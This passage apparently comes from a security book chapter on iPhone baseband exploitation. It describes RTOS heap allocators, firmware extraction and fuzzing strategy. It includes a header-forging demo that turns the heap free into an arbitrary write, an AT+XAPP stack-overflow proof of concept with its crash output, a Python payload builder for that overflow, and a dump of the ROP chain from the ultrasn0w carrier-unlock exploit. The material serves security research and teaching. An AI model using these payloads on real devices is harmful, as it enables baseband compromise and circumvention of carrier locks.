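    """Flat little-endian RAM model with 32-bit accessors."""

    def __init__(self, size):
        self.buf = bytearray(size)

    def r32(self, addr):
        return struct.unpack_from("<I", self.buf, addr)[0]

    def w32(self, addr, value):
        struct.pack_into("<I", self.buf, addr, value & 0xFFFFFFFF)


def deallocate(mem, blk):
    """Simplified coalescing free: only the pool pointer and magic are checked."""
    hdr = blk - HDR_SIZE
    pool = mem.r32(hdr + POOL)
    if pool == 0 or mem.r32(pool + PCB_ID_OFFSET) != DYNA_MAGIC:
        raise ValueError("invalid pool")
    mem.w32(hdr + FREE, 1)
    prev = mem.r32(hdr + PREV)
    if mem.r32(prev + FREE):                  # merge with previous block
        nxt = mem.r32(hdr + NEXT)
        mem.w32(prev + NEXT, nxt)             # prev->next_blk = hdr->next_blk
        mem.w32(nxt + PREV, prev)             # hdr->next_blk->prev_blk = prev
        hdr = prev
    nxt = mem.r32(hdr + NEXT)
    if mem.r32(nxt + FREE):                   # merge with next block
        after = mem.r32(nxt + NEXT)
        mem.w32(hdr + NEXT, after)
        mem.w32(after + PREV, hdr)


# Demo: an overflow has rewritten the header of the block returned as 0x110.
mem = Memory(0x1000)
PCB, TARGET, VALUE = 0x040, 0x800, 0x400
mem.w32(PCB + PCB_ID_OFFSET, DYNA_MAGIC)  # legitimate pool control block
mem.w32(TARGET + FREE, 1)                 # word at TARGET+8 must be non-zero
mem.w32(0x100 + NEXT, VALUE)              # forged next_blk
mem.w32(0x100 + PREV, TARGET)             # forged prev_blk
mem.w32(0x100 + POOL, PCB)                # pool pointer left intact
deallocate(mem, 0x110)
print(hex(mem.r32(TARGET)), hex(mem.r32(VALUE + PREV)))  # 0x400 0x800
```

In this model the attacker must keep the pool pointer valid, and the mirrored write stores TARGET at VALUE + 4, so that location has to be writable as well.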
ThreadX also uses a first-fit allocator that works in a very similar fashion to the one described for Nucleus PLUS; yet it is distinct enough to warrant a detailed description of its own. The control block of a byte pool has the following structure (taken from tx_api.h):
typedef struct TX_BYTE_POOL_STRUCT
{
    /* Define the byte pool ID used for error checking. */
    ULONG tx_byte_pool_id;
    /* Define the byte pool's name. */
    CHAR_PTR tx_byte_pool_name;
    /* Define the number of available bytes in the pool. */
    ULONG tx_byte_pool_available;
    /* Define the number of fragments in the pool. */
    ULONG tx_byte_pool_fragments;
    /* Define the head pointer of byte pool. */
    CHAR_PTR tx_byte_pool_list;
    /* Define the search pointer used for initial searching for memory
       in a byte pool. */
    CHAR_PTR tx_byte_pool_search;
    /* Save the start address of the byte pool's memory area. */
    CHAR_PTR tx_byte_pool_start;
    /* Save the byte pool's size in bytes. */
    ULONG tx_byte_pool_size;
    /* This is used to mark the owner of the byte memory pool during
       a search. If this value changes during the search, the local
       search pointer must be reset. */
    struct TX_THREAD_STRUCT *tx_byte_pool_owner;
    /* Define the byte pool suspension list head along with a count of
       how many threads are suspended. */
    struct TX_THREAD_STRUCT *tx_byte_pool_suspension_list;
    ULONG tx_byte_pool_suspended_count;
    /* Define the created list next and previous pointers. */
    struct TX_BYTE_POOL_STRUCT
        *tx_byte_pool_created_next,
        *tx_byte_pool_created_previous;
} TX_BYTE_POOL;
The header of a memory block simply consists of a field indicating whether this particular memory chunk is still considered “free” (indicated by the magic value 0xFFFFEEEE) or allocated, and a pointer back to the byte pool control block:
struct bpmem_hdr {
    uint32_t      is_free_magic;  /* set to 0xFFFFEEEE if block is free */
    TX_BYTE_POOL *bpcb;           /* pointer to control block of byte memory pool */
};
The tx_byte_allocate() function, used to allocate a block of memory from a given pool, does not traverse tx_byte_pool_list directly but calls a helper function, find_byte_block(), that does so. The same function is also called from tx_byte_release() if another thread is suspended on the pool. Coalescing does not happen immediately when a block of memory is freed but is delayed: if no other threads are waiting, tx_byte_release() only updates the is_free_magic field of the header. Adjacent memory blocks marked as free are coalesced later, in find_byte_block(), when no memory block of the requested size can be found.
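The effect of deferred coalescing can be illustrated with a small model in which freeing only rewrites the header tag, and adjacent free blocks are merged during the search once a free block turns out to be too small for the request. This is a sketch under assumptions: the exact merge trigger, the split rule, and the hypothetical POOL_PTR value are illustrative, and a Python list in address order stands in for the real in-memory block chain.

```python
HDR = 8                    # sizeof(struct bpmem_hdr) on a 32-bit target
FREE_MAGIC = 0xFFFFEEEE
POOL_PTR = 0x20000000      # hypothetical address of the TX_BYTE_POOL control block


class ByteBlock:
    def __init__(self, size, tag):
        self.size = size   # usable bytes following the header
        self.tag = tag     # FREE_MAGIC while free, POOL_PTR while allocated


class LazyBytePool:
    def __init__(self, pool_size):
        self.blocks = [ByteBlock(pool_size - HDR, FREE_MAGIC)]  # in address order

    def release(self, blk):
        # Freeing only rewrites the header; free neighbors are NOT merged here.
        blk.tag = FREE_MAGIC

    def find_block(self, size):
        i = 0
        while i < len(self.blocks):
            blk = self.blocks[i]
            if blk.tag == FREE_MAGIC:
                # Deferred coalescing: while this free block is too small,
                # absorb the physically following block if it is free too.
                while (blk.size < size and i + 1 < len(self.blocks)
                       and self.blocks[i + 1].tag == FREE_MAGIC):
                    blk.size += HDR + self.blocks.pop(i + 1).size
                if blk.size >= size:
                    return i
            i += 1
        return None

    def allocate(self, size):
        i = self.find_block(size)
        if i is None:
            return None
        blk = self.blocks[i]
        if blk.size > size + HDR:  # split off the unused tail as a new free block
            self.blocks.insert(i + 1, ByteBlock(blk.size - size - HDR, FREE_MAGIC))
            blk.size = size
        blk.tag = POOL_PTR
        return blk


pool = LazyBytePool(100)
a, b = pool.allocate(20), pool.allocate(20)
pool.release(a)
pool.release(b)
print(len(pool.blocks))                  # 3: the two freed blocks are still separate
c = pool.allocate(40)                    # too big for a alone, so a and b are merged
print(len(pool.blocks), c is a, c.size)  # 2 True 48
```

For heap exploitation, this means a freed block's stale neighbor headers remain in place until a later search walks over them.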
Looking closely at a Qualcomm stack, you will see that AMSS actually uses several different heap implementations. Because the Iguana allocator is not used for buffers allocated by the modem stack, it does not make sense for us to describe this allocator here. Rather, we investigate the most widely used allocator, which seems to be something like a system allocator on AMSS and is assumed to be called modem_mem_alloc() judging from strings found in the amss.mbn binary.
In contrast to the previous allocators, this one is a best-fit allocator; it is significantly more complicated and somewhat hardened. We cannot describe the allocator in full detail here, but rather concentrate on its most relevant features, which will give you a head start in further reverse-engineering:
Instead of having one list of memory chunks, the allocator keeps 31 bins of memory chunks of different sizes: These bins can accommodate memory allocations up to 0x4, 0x6, 0x8, 0xC, 0x10, 0x18, 0x20, 0x30, 0x40, 0x60, 0x80, 0xC0, 0x100, 0x180, 0x200, 0x300, 0x400, 0x600, 0x800, 0xC00, 0x1000, 0x1800, 0x2000, 0x3000, 0x4000, 0x6000, 0x8000, 0xC000, 0x10000, 0x18000 and 0x20000 respectively. The actual sizes of the blocks in the bins are 16 bytes larger than the size indicated by the bin to account for metadata and align to an 8-byte boundary. The header of a memory block looks as follows:
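Mapping a request to its bin is a simple lookup over the bin limits listed above. The sketch below picks the smallest bin whose limit can hold a request and adds the 16 bytes of overhead mentioned in the text. How the real allocator searches within and across bins (best fit) is not modeled, and the function names are hypothetical.

```python
import bisect

# Bin limits as listed in the text (31 bins)
BIN_LIMITS = [
    0x4, 0x6, 0x8, 0xC, 0x10, 0x18, 0x20, 0x30, 0x40, 0x60, 0x80,
    0xC0, 0x100, 0x180, 0x200, 0x300, 0x400, 0x600, 0x800, 0xC00,
    0x1000, 0x1800, 0x2000, 0x3000, 0x4000, 0x6000, 0x8000, 0xC000,
    0x10000, 0x18000, 0x20000,
]
BLOCK_OVERHEAD = 16  # blocks are 16 bytes larger than the bin limit


def bin_for(request):
    """Index of the smallest bin whose limit can hold `request` bytes."""
    i = bisect.bisect_left(BIN_LIMITS, request)
    if i == len(BIN_LIMITS):
        raise ValueError("request larger than the biggest bin")
    return i


def block_size(request):
    """Size of the block that a request of this size ends up in."""
    return BIN_LIMITS[bin_for(request)] + BLOCK_OVERHEAD


print(bin_for(0x41), hex(block_size(0x41)))
```

A request of 0x41 bytes, for example, falls into the 0x60 bin, so any request between 0x41 and 0x60 bytes is served from blocks of the same size.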
struct mma_header {
    uint32_t  size;         /* size of allocation */
    uint32_t *next;         /* pointer to next block */
    uint8_t   reference;    /* reference value to distinguish different callers */
    uint8_t   blockstatus;  /* determines whether block is free or taken */
    uint8_t   slackspace;   /* slack space at end of block */
    uint8_t   canary;       /* canary value to determine memory corruption */
};
For free blocks the following data structure is used:
struct mma_free_block {
    struct mma_header  hdr;
    struct mma_header *next_free, *prev_free;  /* doubly linked list of free blocks */
};
The canary value used by the allocator is 0x6A. Whenever an mma_header structure is accessed, the allocator checks whether the canary value is still intact and forces a crash if it is not. This matters mostly for accidental rather than intentional memory corruptions, but it is worth keeping in mind when fuzzing the stack. Another feature relevant to heap exploitation is that the allocator checks whether pointers passed to modem_mem_free(ptr) really point into a memory area used by the heap. Creating fake heap structures on the stack therefore will not work.
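The sketch below parses an mma_header and performs the canary check, which is useful, for example, when walking heap memory in a core dump. It assumes little-endian byte order and 32-bit pointers, which give the 12-byte layout of struct mma_header shown above. The heap bounds passed to check_free_pointer are hypothetical parameters, because the real bounds have to be recovered from the firmware.

```python
import struct

# size, next, reference, blockstatus, slackspace, canary (assumed little-endian)
MMA_HEADER = struct.Struct("<IIBBBB")
MMA_CANARY = 0x6A


class HeapCorruption(Exception):
    pass


def parse_mma_header(buf, offset=0):
    """Decode one header; raise where the firmware would force a crash."""
    size, nxt, reference, blockstatus, slackspace, canary = MMA_HEADER.unpack_from(buf, offset)
    if canary != MMA_CANARY:
        raise HeapCorruption(f"bad canary 0x{canary:02x} at offset {offset}")
    return {"size": size, "next": nxt, "reference": reference,
            "blockstatus": blockstatus, "slackspace": slackspace}


def check_free_pointer(ptr, heap_start, heap_end):
    """Mimic the range check on modem_mem_free() arguments (bounds are hypothetical)."""
    if not heap_start <= ptr < heap_end:
        raise HeapCorruption(f"0x{ptr:08x} is not inside the heap")
```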
As of iOS 5.1, the heap allocator described previously has been hardened with a safe-unlinking check. Before performing an unlinking operation, the allocator checks whether free_block->next_free->prev_free == free_block->prev_free->next_free.
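The following Python model shows the check as it is described, applied to a circular free list. FreeBlock and link_ring are illustrative names. As written, the check compares the two neighbour pointers with each other rather than with free_block itself. In an intact list both sides equal free_block. A classic forged next_free pointer makes the two sides disagree.

```python
class FreeBlock:
    def __init__(self, name):
        self.name = name
        self.next_free = None
        self.prev_free = None


def link_ring(blocks):
    """Link blocks into a circular doubly linked free list."""
    for i, blk in enumerate(blocks):
        blk.next_free = blocks[(i + 1) % len(blocks)]
        blk.prev_free = blocks[i - 1]


def unlink(block):
    # Safe-unlinking check as described in the text.
    if block.next_free.prev_free is not block.prev_free.next_free:
        raise RuntimeError("safe-unlinking check failed")
    block.prev_free.next_free = block.next_free
    block.next_free.prev_free = block.prev_free
```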
The previous subsections of this chapter covered the ground you need to be familiar with by providing just enough details about GSM and real-time operating systems to proceed to the core of the matter: finding exploitable vulnerabilities. Before we get there, we still need to explain a couple of operational matters to get to the actual analysis.
Upgrades of the baseband firmware are performed during the normal iOS upgrade/restore process. For older iPhones, up to the 3GS as well as the iPad 1, this firmware is contained in the ramdisk image. To extract it, you need to decrypt this image, mount it, and copy the firmware image from /usr/local/standalone/firmware. To extract the iPhone 2G baseband firmware ICE04.05.04_G.fls from the decrypted iOS 3.1.3 update, you can use the following sequence of steps once you have planetbeing's wonderful xpwntool installed (you can download it from https://github.com/planetbeing/xpwn).
$ wget -q http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-7481.20100202.4orot/iPhone1,1_3.1.3_7E18_Restore.ipsw
$ unzip iPhone1,1_3.1.3_7E18_Restore.ipsw 018-6494-014.dmg
Archive:  iPhone1,1_3.1.3_7E18_Restore.ipsw
  inflating: 018-6494-014.dmg
$ xpwntool 018-6494-014.dmg restore.dmg -k 7029389c2dadaaa1d1e51bf579493824 -iv 25e713dd5663badebe046d0ffa164fee
$ open restore.dmg
$ cp /Volumes/ramdisk/usr/local/standalone/firmware/ICE04.05.04_G.fls .
$ hdiutil eject /Volumes/ramdisk
For newer iPhones and the iPad 2, the baseband firmware can be directly extracted from the IPSW using unzip. In Listing 11.1, the ICE3 firmware is the version running on the X-Gold 61x in the iPhone 4, and the Trek file is used to upgrade the firmware running on the MDM6610 in the iPhone 4S.
Listing 11.1: Baseband firmwares contained in the iPhone 4S 5.0.1 update
$ unzip -l iPhone4,1_5.0.1_9A406_Restore.ipsw Firmware/[IT]*bbfw
Archive:  iPhone4,1_5.0.1_9A406_Restore.ipsw
  Length     Date   Time    Name
 --------    ----   ----    ----
  3815153  12-04-11 02:07   Firmware/ICE3_04.11.08_BOOT_02.13.Release.bbfw
 11154725  12-04-11 02:07   Firmware/Trek-1.0.14.Release.bbfw
 --------                   -------
 14969878                   2 files
The .bbfw files themselves are ZIP archives as well and contain the actual baseband firmware together with a number of loaders:
$ unzip -l ICE3_04.11.08_BOOT_02.13.Release.bbfw
Archive:  ICE3_04.11.08_BOOT_02.13.Release.bbfw
  Length     Date   Time    Name
 --------    ----   ----    ----
    72568  01-13-11 04:14   psi_ram.fls
    64892  01-13-11 04:14   ebl.fls
  7308368  12-04-11 02:07   stack.fls
    40260  01-13-11 04:14   psi_flash.fls
 --------                   -------
  7486088                   4 files
$ unzip -l Trek-1.0.14.Release.bbfw
Archive:  Trek-1.0.14.Release.bbfw
  Length     Date   Time    Name
 --------    ----   ----    ----
 19599360  12-03-11 10:06   amss.mbn
   451464  12-03-11 10:06   osbl.mbn
   122464  12-03-11 10:06   dbl.mbn
   122196  12-03-11 10:06   restoredbl.mbn
 --------                   -------
 20295484                   4 files
Here we are interested only in stack.fls for the X-Gold and amss.mbn for the MDM66x0 chipsets. All other files are loaders, which we do not investigate further. They may nevertheless contain security-critical bugs. For instance, a bug in the signature verification of the firmware would allow you to run different firmware on the phone and hence unlock it.
Infineon .fls files are built with an official ARM compiler toolchain, either ARM RealView Development Suite (RVDS) or ARM Developer Suite (ADS), depending on the version of the baseband firmware. The ARM linker employs a so-called "scatter loading" mechanism to save flash space. At link time, all code segments and all data segments with initialized data are concatenated. Optionally, segments can be compressed with one of two simple run-length encoding algorithms. The linker builds a table with pointers to these regions and with entries for regions that need to be zero-initialized. At run time, startup code iterates over this table, copies the segments to their actual locations in memory, and creates the zero-initialized memory regions as specified.
This means that before you can perform any meaningful analysis on the .fls files, you need to perform the same steps the startup code does. You have several ways to do this: the first is described in an IDA Pro tutorial and involves using the QEMU emulator to simply execute the startup sequence. The second way to get the firmware relocated to its in-memory layout is by using a script or a loader module. A universal scatter loading script written by roxfan has been circulating among iPhone hackers for a while. We have decided to write and release an IDA Pro module (flsloader) for iPhone baseband firmware that incorporates this functionality. You can download this code from the companion website of the book (www.wiley.com/go/ioshackershandbook). There you also find a script make_tasktable.py that automatically identifies the table of tasks that are created by, for instance, Application_Initialize() on Nucleus PLUS or tx_application_define() on ThreadX. This greatly enhances IDA Pro's auto-analysis.
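The sketch below shows the table-driven work that the startup code performs, and that a loader has to replicate, under clearly stated simplifications. The region table is modelled as a list of Python records rather than the binary format the ARM linker emits, the run-length-compressed regions mentioned above are not handled, and Region and scatter_load are hypothetical names.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Region:
    kind: str            # "copy" or "zero" (hypothetical encoding)
    load_addr: int       # run-time address of the region
    length: int
    src_offset: int = 0  # offset into the flash image, for "copy" regions


def scatter_load(image: bytes, table: List[Region]) -> Dict[int, bytes]:
    """Return a map of run-time base address -> region contents."""
    memory = {}
    for r in table:
        if r.kind == "copy":
            data = image[r.src_offset:r.src_offset + r.length]
            if len(data) != r.length:
                raise ValueError("region extends past the end of the image")
            memory[r.load_addr] = data
        elif r.kind == "zero":
            memory[r.load_addr] = bytes(r.length)
        else:
            raise ValueError(f"unknown region kind {r.kind!r}")
    return memory
```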
Qualcomm's firmware files are in standard Executable and Linkable Format (ELF); you do not need a custom IDA Pro loader module to load them.
If you look closely at the connection between the baseband processor and the application processor, it becomes clear that the AT command interpreter is not reached over a dedicated serial line. Instead, many channels are multiplexed, either over a serial line (Infineon-based chips) or over USB (Qualcomm). For the Infineon basebands, the multiplexing is done in the kernel extension com.apple.driver.AppleSerialMultiplexer according to 3GPP 27.010. For Qualcomm baseband processors, a proprietary Qualcomm protocol called Qualcomm MSM Interface (QMI) is used. Source code for an implementation of QMI exists in the Linux kernel fork for the MSM platform created by the CodeAurora Forum (https://www.codeaurora.org/contribute/projects/qkernel).
For analyzing vulnerabilities — and more importantly, for actually exploiting them — it is extremely useful to have some visibility of the state of the system at the time of the crash and, if possible, at run time.
For iOS devices with an Infineon baseband, you can use the AT+XLOG command to obtain a log of baseband crashes and their stack traces. Even better, the X-Gold chips offer a way to trigger a core dump of the baseband memory without first having to exploit a bug. You first need to enable this functionality, which you can do with a special dial string in the Phone dialer (the string is parsed by CommCenter). Calling *5005*CORE# (on the keypad, *5005*2673#) enables core dumps. #5005*2673# turns them off again, and *#5005*2673# shows the status of the setting. Using minicom, you can then send the AT command AT+XLOG=4 to the baseband to trigger an exception, which causes the baseband memory to be dumped. The dump is segmented by memory region and stored in a directory of the form log-bb-yyyy-mm-dd-hh-mm-ss-cd in /var/wireless/Library/Logs/CrashReporter/Baseband:
# cd /var/wireless/Library/Logs/CrashReporter/Baseband/log-bb-2012-01-17-11-36-07-cd
# ls -l
total 9544
-rw-r--r-- 1 _wireless _wireless   65544 Jan 17 11:36 0x00090000.cd
-rw-r--r-- 1 _wireless _wireless   16760 Jan 17 11:39 0x40041000.cd
-rw-r--r-- 1 _wireless _wireless  262152 Jan 17 11:40 0x40ac0000.cd
-rw-r--r-- 1 _wireless _wireless  262152 Jan 17 11:40 0x40b00000.cd
-rw-r--r-- 1 _wireless _wireless  539372 Jan 17 11:36 0x60700000.cd
-rw-r--r-- 1 _wireless _wireless 8564860 Jan 17 11:39 0x60784ae4.cd
-rw-r--r-- 1 _wireless _wireless   16392 Jan 17 11:36 0xffff0000.cd
If you have done everything correctly, you will see a message stating Baseband Core Dump in Progress on the screen of your iPhone for a number of seconds.
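To work with such a dump off the phone, a small helper can map each 0xXXXXXXXX.cd file back to its base address and read words from the result. This is a sketch that makes two assumptions: the file name is the base address of the region, and the contents are little-endian memory. Several sizes in the listing (65544, 262152, 16392) are a power of two plus 8 bytes, which hints at a small per-file header. We have not verified its layout, so header_size is left as a parameter.

```python
import os
import re
import struct

SEGMENT_NAME = re.compile(r"^0x([0-9a-fA-F]{8})\.cd$")


def segments_from_files(files, header_size=0):
    """Map base address -> bytes, given a {file name: contents} mapping."""
    segments = {}
    for name, data in files.items():
        m = SEGMENT_NAME.match(name)
        if m:
            segments[int(m.group(1), 16)] = data[header_size:]
    return segments


def load_core_dump(directory, header_size=0):
    """Read every .cd file in a log-bb-...-cd directory."""
    files = {}
    for name in os.listdir(directory):
        with open(os.path.join(directory, name), "rb") as f:
            files[name] = f.read()
    return segments_from_files(files, header_size)


def read_u32(segments, addr):
    """Read a little-endian 32-bit word from whichever segment covers addr."""
    for base, data in segments.items():
        if base <= addr and addr + 4 <= base + len(data):
            return struct.unpack_from("<I", data, addr - base)[0]
    raise KeyError(f"address 0x{addr:08x} not covered by the dump")
```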
This section evaluates the attack surface that the baseband processor provides. For local exploits, soft unlocks attacked functions exposed through the AT command interpreter, but this is by no means the only way to perform a local attack. Another vector that was used successfully in the past, in an exploit called JerrySIM, is the interface between the SIM and the baseband processor. Considerable complexity is hidden in this interface, especially because SIM Application Toolkit (STK) and USIM Application Toolkit (USAT) messages from the SIM need to be parsed and processed. For Qualcomm basebands, the USB stack might be a viable target for local attacks as well. According to posts on the linux-arm-msm mailing list, Qualcomm seems to be using a ChipIdea core with the corresponding stack. Interestingly, the baseband firmware for the X-Gold 61x chipset also includes a USB stack, but it does not seem to be accessible from the application processor.
When mapping the attack surface that the cellular stack exposes over the air interface, you start at the lowest layer. Audio decoders are a frequent source of memory corruption bugs, even in GSM stacks. Look carefully and you will find voice codecs that send length fields over the air, which the cellular stack in question may or may not trust. The downside of such bugs is that they require an established voice connection as a precondition. One layer up, in the data link layer, memory corruption bugs are possible as well, but frames there are too short (17 bytes) to make exploitation easy.
Arriving at the network layer, you are overwhelmed by a smörgåsbord of opportunities. To see why, look at how 3GPP 24.008, which supersedes GSM specification 04.08, encodes layer 3 messages: Messages can be up to 253 bytes long and encoded in different ways. The designers of this fine standard were apparently influenced by ASN.1. They allow variable-length fields for a wide variety of protocol messages. In a number of cases, even entities that are explicitly stated to be of fixed length are encoded in a format that transmits their length over the air, which creates ambiguity for the parser. This is not the only fruitful area, however. Going higher in the sublayers of layer 3, you find plenty of opportunities to corrupt memory in the handling of supplementary services and in the parsing of short messages. Last but not least, spatial memory corruptions are not the only kind that cellular stacks allow. Many parts of the GSM stack are driven by explicit, large, and complicated state machines. This gives implementers more than enough chances to introduce temporal memory corruptions, such as use-after-frees, into their codebase, especially since some data structures in these state machines are not necessarily allocated and freed by the same task.
However, identifying and reproducing temporal memory corruptions without source code or instrumentation for the cellular stack is a hard problem.
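Many of the variable-length fields mentioned above are length-value (LV) elements. The sketch below shows the two checks that a parser of such an element needs. The declared length must fit inside the received message, and it must not exceed the maximum the specification allows for that element. Omitting the second check is the classic mistake that turns a fixed-size destination buffer into an overflow. The function and exception names are hypothetical, and 24.008 also uses TLV and other element formats that are not covered here.

```python
class ParseError(Exception):
    pass


def parse_lv(msg: bytes, pos: int, max_len: int):
    """Parse an LV element at msg[pos]; return (value, position after it)."""
    if pos >= len(msg):
        raise ParseError("missing length octet")
    length = msg[pos]
    value = msg[pos + 1:pos + 1 + length]
    # Check 1: the declared length must fit inside the received message.
    if len(value) != length:
        raise ParseError("declared length exceeds message")
    # Check 2: the length must respect the maximum specified for this element.
    if length > max_len:
        raise ParseError(f"length {length} exceeds specified maximum {max_len}")
    return value, pos + 1 + length
```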
Because of the number of functions in the IDA Pro databases of the baseband firmware, performing even a shallow audit of the codebase for memory corruptions will be a humongous task.
A straightforward way to find potential memory corruptions in baseband stacks is to look for calls to functions that perform memory block transfers, such as memcpy(), memmove(), and friends. You then investigate at which of these call sites an attacker can obtain sufficient control over the length and/or the destination of the transfer. This task is aided by assertions placed all over the codebase. Whenever an unexpected situation crops up, they log the filename and the line number, and in some cases a message and a result code as well. These strings are present even in the production versions of the baseband firmware.
This way of auditing was very successful on a number of stacks. In the IFX stack, however, the vast majority of memory copies transfer constant-length blocks.
A different approach to finding potential memory corruptions is to read the GSM and 3GPP specifications carefully and take note of all messages that have variable-length elements. For each of these messages, you can then send a version in which one or more elements have a length not supported by the specification (larger than the allowed maximum or smaller than the specified minimum) and observe whether the device crashes. This approach has a number of problems, however. First, fuzz testing messages that operate in a "stateless" fashion, such as those related to Mobility Management, is easy, but things become trickier if you try to find bugs in the Call Control sublayer, for example, where certain messages are available only for established calls. Second, you need a fairly complete understanding of the protocol you are trying to fuzz. With GSM this is difficult, because the protocol is distributed across thousands of standard documents, and you might easily miss the relevance of some of them. Most standards also exist in several revisions, and you do not know a priori which revision a given stack conforms to, so you might miss something unless you are aware of all of them. Last but not least, you will deal with a large number of crashes that turn out to be non-exploitable, and it will take you a long time to work out which of your crashes are exploitable. In general, meaningful fuzz testing of cellular stacks is hard because the specifications are full of explicitly specified state machines that make many code paths hard to reach.
Note, however, that CVE-2010-3832, the bug described later in this chapter, was indeed found by a procedure that could be called "specification-guided fuzz testing."
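The core of such specification-guided fuzzing is choosing lengths around the specified bounds of each variable-length element. The helpers below are hypothetical. They produce boundary and out-of-range lengths for an LV element, plus the candidate messages built from a fixed prefix. Lengths that do not fit into a real layer 3 message would have to be dropped or truncated by whatever sends the messages. Handling state (for example, first establishing a call) is deliberately left out.

```python
def length_variants(min_len, max_len, ceiling=255):
    """Lengths just inside and just outside the specified range of an LV element."""
    candidates = {0, 1, min_len - 1, min_len, max_len, max_len + 1, max_len * 2, ceiling}
    return sorted(n for n in candidates if 0 <= n <= ceiling)


def make_lv(length, fill=0x41):
    """Encode an LV element whose value consists of `length` filler bytes."""
    return bytes([length]) + bytes([fill]) * length


def fuzz_cases(prefix, min_len, max_len):
    """Yield candidate messages: a fixed prefix followed by a mutated LV element."""
    for n in length_variants(min_len, max_len):
        yield prefix + make_lv(n)
```

For an element that the specification fixes at five octets (min_len == max_len == 5), this yields lengths 0, 1, 4, 5, 6, 10, and 255.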
This section examines two memory corruption vulnerabilities that can be used to take control of the baseband. The first is a local vulnerability that can be exploited through the AT command interpreter. The second can be exploited over the air to attack vulnerable iPhones remotely from a rogue base station in their proximity.
The AT+XAPP vulnerability is a classic stack buffer overflow that the ultrasn0w unlock has used as one of its injection vectors. It is present in all S-Gold 2 basebands, in the X-Gold 608 basebands up to versions 05.13.04 (iPhone 3G/3GS) and 06.15.00 (iPad), and in the X-Gold 61x baseband in version 01.59.00. The vulnerability was discovered independently by @sherif_hashim, @Oranav, @westbaer, and geohot while testing AT commands for crashes.
Having an easily exploitable local memory corruption is a very useful step before investigating remote vulnerabilities. The following example shows the effect of the PoC trigger on an iPhone 2G running the ICE baseband version 04.05.04_G:
# ./sendmodem 'AT+XAPP="####################################4444555566667777PPPP"'
Sending command to modem: AT
------.+
AT
OK
Sending command to modem: AT+XAPP="####################################4444555566667777PPPP"
-.+
# ./sendmodem 'AT+XLOG'
Sending command to modem: AT
-.+
AT
OK
Sending command to modem: AT+XLOG
-........+
AT+XLOG
+XGENDATA: "DEV_ICE_MODEM_04.05.04_G "
+XLOG: Exception Number: 1
Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP)
System Stack:
0xA0086800
[176 DWORDs omitted]
0x00000000
Date: 15.01.2012
Time: 05:47
Register:
r0:  0x00000000 r1:  0x00000000 r2:  0xFFFF231C r3:  0xB0101FF9
r4:  0x34343434 r5:  0x35353535 r6:  0x36363636 r7:  0x37373737
r8:  0x00000000 r9:  0xA00028E4 r10: 0xB00AC938 r11: 0xB00B67CC
r12: 0xA0114F95 r13: 0xB00B2CF4 r14: 0xA010E97D r15: 0x50505054
SPSR: 0x40000013 DFAR: 0x00000001 DFSR: 0x00000005
OK
#
As you can see, this overflow can be used to set registers r4–r7 as well as the program counter. You can easily use this overflow to inject your own code into the baseband.
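A payload builder for this trigger has to lay out the padding, the four saved registers, and the new program counter, and it must keep bytes out of the string that the AT parser will not accept. The sketch makes these assumptions. The padding length is a parameter that has to be taken from the PoC for the firmware version at hand. The set of forbidden bytes (NUL, LF, CR, space, and the closing quote) is our guess, based on the remark elsewhere in this chapter that whitespace and zero bytes are not allowed. xapp_command is a hypothetical name.

```python
import struct

# Assumption: bytes that cannot appear raw inside the quoted AT+XAPP argument.
FORBIDDEN = {0x00, 0x0A, 0x0D, 0x20, 0x22}


def xapp_command(padding_len, r4, r5, r6, r7, pc, pad=b"#"):
    """Build an AT+XAPP overflow string that sets r4-r7 and the PC (little-endian)."""
    body = pad * padding_len + struct.pack("<5I", r4, r5, r6, r7, pc)
    bad = sorted({b for b in body if b in FORBIDDEN})
    if bad:
        raise ValueError(f"payload contains forbidden bytes: {[hex(b) for b in bad]}")
    return b'AT+XAPP="' + body + b'"'
```

With the register values from the PoC above (0x34343434 through 0x37373737, and 0x50505050 for the PC), the tail of the string reproduces 4444555566667777PPPP.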
Here you investigate how the AT+XAPP overflow was used by the ultrasn0w unlock to circumvent the network lock on the iPhone 4.
First you have to understand the logistics of the ultrasn0w package. The unlock works by injecting a dynamic library into the CommCenter process using the MobileSubstrate framework. After checking that it is talking to a supported version of the baseband software, this dynamic library sends a sequence of AT commands to the baseband processor that exploits the AT+XAPP overflow and places a sequence of payloads there. The final goal is to intercept and modify messages sent and received by the so-called SEC thread (func_sec_process), so that the rest of the cellular stack sees a fake unlocked state. Previous versions of ultrasn0w for the X-Gold 608 chipset achieved this by creating a separate Nucleus task that intercepted mailbox messages and replaced them. The ultrasn0w version for the iPhone 4 takes a different route and overwrites the parts of ThreadX that are responsible for the interthread communication of the SEC thread. This section covers the tricks used to achieve this. The latest version of ultrasn0w for the iPhone 4 is by far the most elaborate unlock in existence, bordering on art.
If you disassemble the dynamic object ultrasn0w.dylib located in /Library/MobileSubstrate/DynamicLibraries on your iPhone after the installation of ultrasn0w, you find an array of pointers to strings called unlock_strings that points to four different instantiations of the at+xapp overflow exploited on the baseband processor. Dissecting these allows you to unravel the unlock and appreciate its level of sophistication.
Here is the initial code injection. Already in the first unlock string, you might notice something unexpected. Instead of injecting code directly, it uses a ROP chain built from a single gadget to stitch together a piece of code at the very top of memory. The gadget is entered once at 0x6014A0F3 for the initial POP and then at 0x6014A0F1 for each store:
0x00000000 DCD 0x34343434 ; R4 [unused]
0x00000004 DCD 0x35353535 ; R5 [unused]
0x00000008 DCD 0x36363636 ; R6 [unused]
0x0000000C DCD 0x37373737 ; R7 [unused]
0x00000010 DCD 0x6014A0F3 ; POP {R3-R5}, PC
0x00000014 DCD 'UUUU'     ; R3 [unused]
0x00000018 DCD 0x47804807 ; R4 [code/data]
0x0000001C DCD 0xFFFF1FD0 ; R5 [address]
0x00000020 DCD 0x6014A0F1 ; STR R4, [R5]
0x00000020                ; POP {R3-R5}, PC
0x00000024 DCD 'UUUU'     ; R3 [unused]
0x00000028 DCD 0xBC0F1C07 ; R4 [code/data]
0x0000002C DCD 0xFFFF1FD4 ; R5 [address]
0x00000030 DCD 0x6014A0F1 ; STR R4, [R5]
0x00000030                ; POP {R3-R5}, PC
[...]
0x000000B4 DCD 'UUUU'     ; R3 [unused]
0x000000B8 DCD 0x601FD9FC ; R4 [code/data]
0x000000BC DCD 0xFFFF1FF8 ; R5 [address]
0x000000C0 DCD 0x6014A0F1 ; STR R4, [R5]
0x000000C0                ; POP {R3-R5}, PC
0x000000C4 DCD '3333'     ; R3 [unused]
0x000000C8 DCD '4444'     ; R4 [unused]
0x000000CC DCD '5555'     ; R5 [unused]
